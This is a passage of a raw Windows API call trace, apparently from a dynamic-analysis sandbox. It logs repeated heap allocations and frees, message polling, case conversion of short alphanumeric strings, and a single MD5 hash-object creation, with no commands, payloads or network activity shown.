RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.782] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0162.782] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.782] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.783] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.783] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.783] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0162.783] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0162.783] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0162.783] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0162.783] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0162.784] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0162.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0162.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0162.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0162.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0162.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0162.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0162.785] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0162.785] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.785] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0162.785] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.785] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0162.785] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.785] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.786] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.786] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.786] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.786] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.786] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0162.786] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0162.786] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.787] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0162.787] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.787] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.787] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.787] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0162.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0162.788] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.788] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0162.788] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.788] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.788] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0162.788] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0162.788] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0162.789] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0162.789] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.789] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0162.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.789] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0162.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0162.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0162.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0162.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0162.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0162.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0162.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0162.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0162.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0162.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0162.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0162.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0162.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0162.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | 